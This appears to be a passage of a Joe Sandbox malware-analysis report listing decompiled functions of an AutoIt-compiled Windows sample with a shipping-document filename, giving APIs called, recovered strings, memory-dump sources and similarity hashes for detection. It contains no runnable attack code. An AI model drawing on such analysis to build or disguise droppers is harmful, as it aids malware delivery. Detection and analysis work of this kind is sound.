                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: d1028eb84f058892f4b1260677f1a682194faf18641bb703c39914a208c96169
                                                                • Instruction ID: f633ed6ed32d653ed103e6ecfaa5ccbdb6eb7a5aaac218c3cb300cf7c70e89aa
                                                                • Opcode Fuzzy Hash: d1028eb84f058892f4b1260677f1a682194faf18641bb703c39914a208c96169
                                                                • Instruction Fuzzy Hash: 6531D035A00309BBEF24DF5DDA85BAEBBFCEF45350F140029E985AA2A0D7709948CB51
                                                                Function 009A39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __snwprintf.LIBCMT ref: 009A3A66
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __snwprintf_memmove
                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                • API String ID: 3506404897-2584243854
                                                                • Opcode ID: 66bbb6c3e87878c945a091e5b8dbc6f57df2f4a58ead900fd4791f67aa44c343
                                                                • Instruction ID: 013e8e8856261fed918bae3f0f7e8fa99250bdf1bd472efd66aa1e152e72d624
                                                                • Opcode Fuzzy Hash: 66bbb6c3e87878c945a091e5b8dbc6f57df2f4a58ead900fd4791f67aa44c343
                                                                • Instruction Fuzzy Hash: B1217371604229AFCF11EFA4CC82BAEB7B5AF85700F504454F449AB281DB30EA45CFA1
                                                                Function 009B66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009B6761
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B676C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: Combobox
                                                                • API String ID: 3850602802-2096851135
                                                                • Opcode ID: 31a2b4b6d97d241ef6468ee35884d807918ad8cdafb50ec28025f9aa8ddb0187
                                                                • Instruction ID: 88d751999a3677fb778fdc065fe97c793daacb604b0c85ba000683dc647f8512
                                                                • Opcode Fuzzy Hash: 31a2b4b6d97d241ef6468ee35884d807918ad8cdafb50ec28025f9aa8ddb0187
                                                                • Instruction Fuzzy Hash: 9F11B271210208AFEF219F54CDC1EFB376EEB88378F110129F91497290DA79AC5187A0
                                                                Function 009B6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00931D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00931D73
                                                                  • Part of subcall function 00931D35: GetStockObject.GDI32(00000011), ref: 00931D87
                                                                  • Part of subcall function 00931D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00931D91
                                                                • GetWindowRect.USER32(00000000,?), ref: 009B6C71
                                                                • GetSysColor.USER32(00000012), ref: 009B6C8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                • String ID: static
                                                                • API String ID: 1983116058-2160076837
                                                                • Opcode ID: 7ca7d96159cc70aa5e95e6932355c7d58339c31cc03c294b1fb02ecabeb9fad4
                                                                • Instruction ID: 4cee9158375275bf796fb75e4f994f62db300056a32559bd43389ae02dc92741
                                                                • Opcode Fuzzy Hash: 7ca7d96159cc70aa5e95e6932355c7d58339c31cc03c294b1fb02ecabeb9fad4
                                                                • Instruction Fuzzy Hash: D8215672620209AFDF04DFB8CD45AFA7BA8FB08324F104A28FE95D3250D635E850DB60
                                                                Function 009B6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 009B69A2
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009B69B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LengthMessageSendTextWindow
                                                                • String ID: edit
                                                                • API String ID: 2978978980-2167791130
                                                                • Opcode ID: 3e8cae92e81c734d43be1e93695da32b4802e65036557186776ba350a97a0992
                                                                • Instruction ID: 95e3ee1a9628ecead5269cca226d9569368166d362dc376799948d6e1e7a0a19
                                                                • Opcode Fuzzy Hash: 3e8cae92e81c734d43be1e93695da32b4802e65036557186776ba350a97a0992
                                                                • Instruction Fuzzy Hash: 55118F71110208ABEB108E64DE50AFB376DEB45378F504728F9A5971E0C779EC50A760
                                                                Function 009929AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992A22
                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00992A41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: 62b26e9e82d89cc029868bc94380e8711c230447442971792dedbaf52e904c08
                                                                • Instruction ID: f25c81008887e7fb698aa26e2a60b9f342ae5329bba4101e30a9de476ec63146
                                                                • Opcode Fuzzy Hash: 62b26e9e82d89cc029868bc94380e8711c230447442971792dedbaf52e904c08
                                                                • Instruction Fuzzy Hash: CD11A933916218BBCF30DB9CD844FAE77ACAB86310F154021EA59A72E0D770AD0AC791
                                                                Function 009A21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009A222C
                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009A2255
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Internet$OpenOption
                                                                • String ID: <local>
                                                                • API String ID: 942729171-4266983199
                                                                • Opcode ID: 2fb7e8f2ef2427361427326f6bb781023b8755eb76d66f224ab62c6d1768a976
                                                                • Instruction ID: 1df88ad4cd1cc8afe1ae23a5b54b8a14b9051b22cefb716e36393e459b564f4b
                                                                • Opcode Fuzzy Hash: 2fb7e8f2ef2427361427326f6bb781023b8755eb76d66f224ab62c6d1768a976
                                                                • Instruction Fuzzy Hash: 83110270505225BADB298F598C84FBBFBACFF07361F10862AF92446000D270A880D6F0
                                                                Function 009A7D8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009A7FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009A7DB3,?,00000000,?,?), ref: 009A800D
                                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009A7DB6
                                                                • htons.WSOCK32(00000000,?,00000000), ref: 009A7DF3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                                • String ID: 255.255.255.255
                                                                • API String ID: 2496851823-2422070025
                                                                • Opcode ID: ce652d8efe99d4a32fce941c6f4095e5d3a5f45f4f6cfa7e1ba28cb8094bc2b2
                                                                • Instruction ID: fd589bab9667dfea79d3de5a698bcfe0fdcbde6c812a007531fe300057f92d0b
                                                                • Opcode Fuzzy Hash: ce652d8efe99d4a32fce941c6f4095e5d3a5f45f4f6cfa7e1ba28cb8094bc2b2
                                                                • Instruction Fuzzy Hash: DF11A134504209ABCB20AFA4DC86FBEF769FF45320F204A6AF9159B2D1DB71AC11D794
                                                                Function 0094092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00933C14,009F52F8,?,?,?), ref: 0094096E
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • _wcscat.LIBCMT ref: 00974CB7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FullNamePath_memmove_wcscat
                                                                • String ID: `2
                                                                • API String ID: 257928180-1895914145
                                                                • Opcode ID: db8fb316ac94aa4e5a5f04573e7ef332567c75aa92555a33ff946c115f4dc580
                                                                • Instruction ID: a53e3ba47d36780994315ff9efbfb9cad20d51b70efe90182254793cdec04d9c
                                                                • Opcode Fuzzy Hash: db8fb316ac94aa4e5a5f04573e7ef332567c75aa92555a33ff946c115f4dc580
                                                                • Instruction Fuzzy Hash: C511A535A0930DABCB10FBA4CC16FDDB3FCAF88350F0144A5BB48D3281EAB096844B10
                                                                Function 00988E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00988E73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 372448540-1403004172
                                                                • Opcode ID: d61dfaf77276663dbcac174440a4827500271810458ca0cbc230922d17129fc1
                                                                • Instruction ID: 8d0324e0b536dd9742f12c680cafb7dd4c7a8d0c6a4de73c85fb552f2801cdab
                                                                • Opcode Fuzzy Hash: d61dfaf77276663dbcac174440a4827500271810458ca0cbc230922d17129fc1
                                                                • Instruction Fuzzy Hash: 0101F5B1601218ABDF15FBE0CC51AFEB369EF85320B440A19B831673D2DE315808C760
                                                                Function 00998D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __fread_nolock_memmove
                                                                • String ID: EA06
                                                                • API String ID: 1988441806-3962188686
                                                                • Opcode ID: 3e516bafa41322cc960824b39e725e18a6d29b33b8f6ec85021e059368780a32
                                                                • Instruction ID: d4cafbb796781ae4f668f1151eb594ca65450bc99f8b9d800beeb7e75471472d
                                                                • Opcode Fuzzy Hash: 3e516bafa41322cc960824b39e725e18a6d29b33b8f6ec85021e059368780a32
                                                                • Instruction Fuzzy Hash: 8501F5728042587EDF28CAA9C816FEEBBFCDB11301F00459EF556D21C1E879E6088BA0
                                                                Function 00988CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00988D6B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 372448540-1403004172
                                                                • Opcode ID: 256f95e7977c57c9ca77c40ceebecdcf59e5e318be8292dc3470e5f750fb895f
                                                                • Instruction ID: 2555bd73eecbd9a546d393319d3fe128155523c60bc618a5de8b5136d54e7710
                                                                • Opcode Fuzzy Hash: 256f95e7977c57c9ca77c40ceebecdcf59e5e318be8292dc3470e5f750fb895f
                                                                • Instruction Fuzzy Hash: 8101D4B1A41108ABDF25FBE1C952BFFB3A8DF55300F54041AB812632D1DE145E08D771
                                                                Function 00988D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00988DEE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 372448540-1403004172
                                                                • Opcode ID: 9d8f8597e10682994d7f61d130f637ad2f0dc8b6ea84c84ac7d004e2a118c133
                                                                • Instruction ID: 507f2b35047eac45aa74f4326b6c73cd0d8427c1b3ca63a1aa8f6acd4bfef2fc
                                                                • Opcode Fuzzy Hash: 9d8f8597e10682994d7f61d130f637ad2f0dc8b6ea84c84ac7d004e2a118c133
                                                                • Instruction Fuzzy Hash: EC01DFB1A41108A7DB25FAE4C982BFFB3AC9B55300F540416B811632D2DA255E08D672
                                                                Function 00994F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp
                                                                • String ID: #32770
                                                                • API String ID: 2292705959-463685578
                                                                • Opcode ID: feb5c57afdc51503febad4705e2651742d26466ca4c60e16d1592c00c2871334
                                                                • Instruction ID: 6ed6a286870644a96e98cee8734d8651765106d40e9d107918dddf41de5c8712
                                                                • Opcode Fuzzy Hash: feb5c57afdc51503febad4705e2651742d26466ca4c60e16d1592c00c2871334
                                                                • Instruction Fuzzy Hash: 50E092326043292AD7209A9AAC49FA7F7ACEB85B71F0001AAFD04D6051E9609A46C7E1
                                                                Function 0096B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0096B314: _memset.LIBCMT ref: 0096B321
                                                                  • Part of subcall function 00950940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0096B2F0,?,?,?,0093100A), ref: 00950945
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0093100A), ref: 0096B2F4
                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0093100A), ref: 0096B303
                                                                Strings
                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0096B2FE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                • API String ID: 3158253471-631824599
                                                                • Opcode ID: 23664fd3d23ee578cf5a513c996e882bb49d4b2a17e0219a47e63d0762847b32
                                                                • Instruction ID: 24db6233f769eb60d7cc6869074a4482358c45675c6e83e37985512ae49c8b27
                                                                • Opcode Fuzzy Hash: 23664fd3d23ee578cf5a513c996e882bb49d4b2a17e0219a47e63d0762847b32
                                                                • Instruction Fuzzy Hash: 54E065702147018BD720DF28EA14B467BE8AF80358F008A2DE896C7345EBB4E488CBA1
                                                                Function 00987C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00987C82
                                                                  • Part of subcall function 00953358: _doexit.LIBCMT ref: 00953362
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Message_doexit
                                                                • String ID: AutoIt$Error allocating memory.
                                                                • API String ID: 1993061046-4017498283
                                                                • Opcode ID: 95444e1bd125de6065feba037d735e34009407a272c1f3c704967ef4832756dd
                                                                • Instruction ID: 5871d2f2b2ec3e7a1a1e82c65a350b103c77a9bb6f73e38feb80c9d9be9b6180
                                                                • Opcode Fuzzy Hash: 95444e1bd125de6065feba037d735e34009407a272c1f3c704967ef4832756dd
                                                                • Instruction Fuzzy Hash: 92D02B323C831832D20532E66C07FCAB7484F85B57F100015FF08595D349D2888043E9
                                                                Function 009B5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B59AE
                                                                • PostMessageW.USER32(00000000), ref: 009B59B5
                                                                  • Part of subcall function 00995244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: f1f404a120d099311585647ba2737d5528b810252678c41dbfce32e979413308
                                                                • Instruction ID: ebc1fc86b7681bef0cc5f239009995de6dfcd76c8434ae54a5174a3ff8bf0ada
                                                                • Opcode Fuzzy Hash: f1f404a120d099311585647ba2737d5528b810252678c41dbfce32e979413308
